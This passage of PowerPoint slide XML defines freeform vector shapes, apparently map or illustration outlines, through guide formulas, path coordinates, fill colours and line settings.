                  <a:gd name="T82" fmla="*/ 76 w 107"/>
                  <a:gd name="T83" fmla="*/ 50 h 54"/>
                  <a:gd name="T84" fmla="*/ 67 w 107"/>
                  <a:gd name="T85" fmla="*/ 51 h 54"/>
                  <a:gd name="T86" fmla="*/ 61 w 107"/>
                  <a:gd name="T87" fmla="*/ 52 h 54"/>
                  <a:gd name="T88" fmla="*/ 57 w 107"/>
                  <a:gd name="T89" fmla="*/ 53 h 54"/>
                  <a:gd name="T90" fmla="*/ 54 w 107"/>
                  <a:gd name="T91" fmla="*/ 54 h 54"/>
                  <a:gd name="T92" fmla="*/ 42 w 107"/>
                  <a:gd name="T93" fmla="*/ 44 h 54"/>
                  <a:gd name="T94" fmla="*/ 35 w 107"/>
                  <a:gd name="T95" fmla="*/ 48 h 54"/>
                  <a:gd name="T96" fmla="*/ 22 w 107"/>
                  <a:gd name="T97" fmla="*/ 46 h 54"/>
                  <a:gd name="T98" fmla="*/ 25 w 107"/>
                  <a:gd name="T99" fmla="*/ 40 h 54"/>
                  <a:gd name="T100" fmla="*/ 25 w 107"/>
                  <a:gd name="T101" fmla="*/ 32 h 54"/>
                  <a:gd name="T102" fmla="*/ 21 w 107"/>
                  <a:gd name="T103" fmla="*/ 17 h 54"/>
                  <a:gd name="T104" fmla="*/ 14 w 107"/>
                  <a:gd name="T105" fmla="*/ 11 h 54"/>
                  <a:gd name="T106" fmla="*/ 3 w 107"/>
                  <a:gd name="T107" fmla="*/ 7 h 54"/>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107"/>
                  <a:gd name="T163" fmla="*/ 0 h 54"/>
                  <a:gd name="T164" fmla="*/ 107 w 107"/>
                  <a:gd name="T165" fmla="*/ 54 h 54"/>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107" h="54">
                    <a:moveTo>
                      <a:pt x="0" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36436" name="Freeform 168"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3375" y="2175"/>
                <a:ext cx="107" cy="54"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 107"/>
                  <a:gd name="T1" fmla="*/ 2 h 54"/>
                  <a:gd name="T2" fmla="*/ 5 w 107"/>
                  <a:gd name="T3" fmla="*/ 0 h 54"/>
                  <a:gd name="T4" fmla="*/ 8 w 107"/>
                  <a:gd name="T5" fmla="*/ 1 h 54"/>
                  <a:gd name="T6" fmla="*/ 13 w 107"/>
                  <a:gd name="T7" fmla="*/ 2 h 54"/>
                  <a:gd name="T8" fmla="*/ 17 w 107"/>
                  <a:gd name="T9" fmla="*/ 5 h 54"/>
                  <a:gd name="T10" fmla="*/ 21 w 107"/>
                  <a:gd name="T11" fmla="*/ 5 h 54"/>
                  <a:gd name="T12" fmla="*/ 24 w 107"/>
                  <a:gd name="T13" fmla="*/ 7 h 54"/>
                  <a:gd name="T14" fmla="*/ 28 w 107"/>
                  <a:gd name="T15" fmla="*/ 8 h 54"/>
                  <a:gd name="T16" fmla="*/ 33 w 107"/>
                  <a:gd name="T17" fmla="*/ 9 h 54"/>
                  <a:gd name="T18" fmla="*/ 40 w 107"/>
                  <a:gd name="T19" fmla="*/ 8 h 54"/>
                  <a:gd name="T20" fmla="*/ 44 w 107"/>
                  <a:gd name="T21" fmla="*/ 9 h 54"/>
                  <a:gd name="T22" fmla="*/ 48 w 107"/>
                  <a:gd name="T23" fmla="*/ 11 h 54"/>
                  <a:gd name="T24" fmla="*/ 51 w 107"/>
                  <a:gd name="T25" fmla="*/ 14 h 54"/>
                  <a:gd name="T26" fmla="*/ 57 w 107"/>
                  <a:gd name="T27" fmla="*/ 16 h 54"/>
                  <a:gd name="T28" fmla="*/ 61 w 107"/>
                  <a:gd name="T29" fmla="*/ 18 h 54"/>
                  <a:gd name="T30" fmla="*/ 60 w 107"/>
                  <a:gd name="T31" fmla="*/ 21 h 54"/>
                  <a:gd name="T32" fmla="*/ 63 w 107"/>
                  <a:gd name="T33" fmla="*/ 22 h 54"/>
                  <a:gd name="T34" fmla="*/ 67 w 107"/>
                  <a:gd name="T35" fmla="*/ 21 h 54"/>
                  <a:gd name="T36" fmla="*/ 69 w 107"/>
                  <a:gd name="T37" fmla="*/ 19 h 54"/>
                  <a:gd name="T38" fmla="*/ 73 w 107"/>
                  <a:gd name="T39" fmla="*/ 18 h 54"/>
                  <a:gd name="T40" fmla="*/ 76 w 107"/>
                  <a:gd name="T41" fmla="*/ 20 h 54"/>
                  <a:gd name="T42" fmla="*/ 78 w 107"/>
                  <a:gd name="T43" fmla="*/ 18 h 54"/>
                  <a:gd name="T44" fmla="*/ 80 w 107"/>
                  <a:gd name="T45" fmla="*/ 19 h 54"/>
                  <a:gd name="T46" fmla="*/ 83 w 107"/>
                  <a:gd name="T47" fmla="*/ 20 h 54"/>
                  <a:gd name="T48" fmla="*/ 86 w 107"/>
                  <a:gd name="T49" fmla="*/ 23 h 54"/>
                  <a:gd name="T50" fmla="*/ 91 w 107"/>
                  <a:gd name="T51" fmla="*/ 23 h 54"/>
                  <a:gd name="T52" fmla="*/ 91 w 107"/>
                  <a:gd name="T53" fmla="*/ 26 h 54"/>
                  <a:gd name="T54" fmla="*/ 93 w 107"/>
                  <a:gd name="T55" fmla="*/ 32 h 54"/>
                  <a:gd name="T56" fmla="*/ 97 w 107"/>
                  <a:gd name="T57" fmla="*/ 34 h 54"/>
                  <a:gd name="T58" fmla="*/ 100 w 107"/>
                  <a:gd name="T59" fmla="*/ 34 h 54"/>
                  <a:gd name="T60" fmla="*/ 103 w 107"/>
                  <a:gd name="T61" fmla="*/ 37 h 54"/>
                  <a:gd name="T62" fmla="*/ 100 w 107"/>
                  <a:gd name="T63" fmla="*/ 40 h 54"/>
                  <a:gd name="T64" fmla="*/ 100 w 107"/>
                  <a:gd name="T65" fmla="*/ 43 h 54"/>
                  <a:gd name="T66" fmla="*/ 106 w 107"/>
                  <a:gd name="T67" fmla="*/ 48 h 54"/>
                  <a:gd name="T68" fmla="*/ 106 w 107"/>
                  <a:gd name="T69" fmla="*/ 53 h 54"/>
                  <a:gd name="T70" fmla="*/ 103 w 107"/>
                  <a:gd name="T71" fmla="*/ 54 h 54"/>
                  <a:gd name="T72" fmla="*/ 100 w 107"/>
                  <a:gd name="T73" fmla="*/ 52 h 54"/>
                  <a:gd name="T74" fmla="*/ 97 w 107"/>
                  <a:gd name="T75" fmla="*/ 52 h 54"/>
                  <a:gd name="T76" fmla="*/ 91 w 107"/>
                  <a:gd name="T77" fmla="*/ 48 h 54"/>
                  <a:gd name="T78" fmla="*/ 85 w 107"/>
                  <a:gd name="T79" fmla="*/ 46 h 54"/>
                  <a:gd name="T80" fmla="*/ 80 w 107"/>
                  <a:gd name="T81" fmla="*/ 49 h 54"/>
                  <a:gd name="T82" fmla="*/ 76 w 107"/>
                  <a:gd name="T83" fmla="*/ 50 h 54"/>
                  <a:gd name="T84" fmla="*/ 67 w 107"/>
                  <a:gd name="T85" fmla="*/ 51 h 54"/>
                  <a:gd name="T86" fmla="*/ 61 w 107"/>
                  <a:gd name="T87" fmla="*/ 52 h 54"/>
                  <a:gd name="T88" fmla="*/ 57 w 107"/>
                  <a:gd name="T89" fmla="*/ 53 h 54"/>
                  <a:gd name="T90" fmla="*/ 54 w 107"/>
                  <a:gd name="T91" fmla="*/ 54 h 54"/>
                  <a:gd name="T92" fmla="*/ 42 w 107"/>
                  <a:gd name="T93" fmla="*/ 44 h 54"/>
                  <a:gd name="T94" fmla="*/ 35 w 107"/>
                  <a:gd name="T95" fmla="*/ 48 h 54"/>
                  <a:gd name="T96" fmla="*/ 22 w 107"/>
                  <a:gd name="T97" fmla="*/ 46 h 54"/>
                  <a:gd name="T98" fmla="*/ 25 w 107"/>
                  <a:gd name="T99" fmla="*/ 40 h 54"/>
                  <a:gd name="T100" fmla="*/ 25 w 107"/>
                  <a:gd name="T101" fmla="*/ 32 h 54"/>
                  <a:gd name="T102" fmla="*/ 21 w 107"/>
                  <a:gd name="T103" fmla="*/ 17 h 54"/>
                  <a:gd name="T104" fmla="*/ 14 w 107"/>
                  <a:gd name="T105" fmla="*/ 11 h 54"/>
                  <a:gd name="T106" fmla="*/ 3 w 107"/>
                  <a:gd name="T107" fmla="*/ 7 h 54"/>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107"/>
                  <a:gd name="T163" fmla="*/ 0 h 54"/>
                  <a:gd name="T164" fmla="*/ 107 w 107"/>
                  <a:gd name="T165" fmla="*/ 54 h 54"/>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107" h="54">
                    <a:moveTo>
                      <a:pt x="0" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36437" name="Freeform 169"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2875" y="2735"/>
                <a:ext cx="119" cy="183"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 119"/>
                  <a:gd name="T1" fmla="*/ 176 h 183"/>
                  <a:gd name="T2" fmla="*/ 21 w 119"/>
                  <a:gd name="T3" fmla="*/ 175 h 183"/>
                  <a:gd name="T4" fmla="*/ 21 w 119"/>
                  <a:gd name="T5" fmla="*/ 164 h 183"/>
                  <a:gd name="T6" fmla="*/ 19 w 119"/>
                  <a:gd name="T7" fmla="*/ 155 h 183"/>
                  <a:gd name="T8" fmla="*/ 19 w 119"/>
                  <a:gd name="T9" fmla="*/ 148 h 183"/>
                  <a:gd name="T10" fmla="*/ 15 w 119"/>
                  <a:gd name="T11" fmla="*/ 144 h 183"/>
                  <a:gd name="T12" fmla="*/ 7 w 119"/>
                  <a:gd name="T13" fmla="*/ 143 h 183"/>
                  <a:gd name="T14" fmla="*/ 6 w 119"/>
                  <a:gd name="T15" fmla="*/ 137 h 183"/>
                  <a:gd name="T16" fmla="*/ 1 w 119"/>
                  <a:gd name="T17" fmla="*/ 134 h 183"/>
                  <a:gd name="T18" fmla="*/ 3 w 119"/>
                  <a:gd name="T19" fmla="*/ 129 h 183"/>
                  <a:gd name="T20" fmla="*/ 4 w 119"/>
                  <a:gd name="T21" fmla="*/ 118 h 183"/>
                  <a:gd name="T22" fmla="*/ 14 w 119"/>
                  <a:gd name="T23" fmla="*/ 108 h 183"/>
                  <a:gd name="T24" fmla="*/ 26 w 119"/>
                  <a:gd name="T25" fmla="*/ 99 h 183"/>
                  <a:gd name="T26" fmla="*/ 35 w 119"/>
                  <a:gd name="T27" fmla="*/ 100 h 183"/>
                  <a:gd name="T28" fmla="*/ 41 w 119"/>
                  <a:gd name="T29" fmla="*/ 108 h 183"/>
                  <a:gd name="T30" fmla="*/ 45 w 119"/>
                  <a:gd name="T31" fmla="*/ 104 h 183"/>
                  <a:gd name="T32" fmla="*/ 50 w 119"/>
                  <a:gd name="T33" fmla="*/ 96 h 183"/>
                  <a:gd name="T34" fmla="*/ 60 w 119"/>
                  <a:gd name="T35" fmla="*/ 74 h 183"/>
                  <a:gd name="T36" fmla="*/ 64 w 119"/>
                  <a:gd name="T37" fmla="*/ 72 h 183"/>
                  <a:gd name="T38" fmla="*/ 67 w 119"/>
                  <a:gd name="T39" fmla="*/ 61 h 183"/>
                  <a:gd name="T40" fmla="*/ 70 w 119"/>
                  <a:gd name="T41" fmla="*/ 58 h 183"/>
                  <a:gd name="T42" fmla="*/ 75 w 119"/>
                  <a:gd name="T43" fmla="*/ 50 h 183"/>
                  <a:gd name="T44" fmla="*/ 83 w 119"/>
                  <a:gd name="T45" fmla="*/ 32 h 183"/>
                  <a:gd name="T46" fmla="*/ 91 w 119"/>
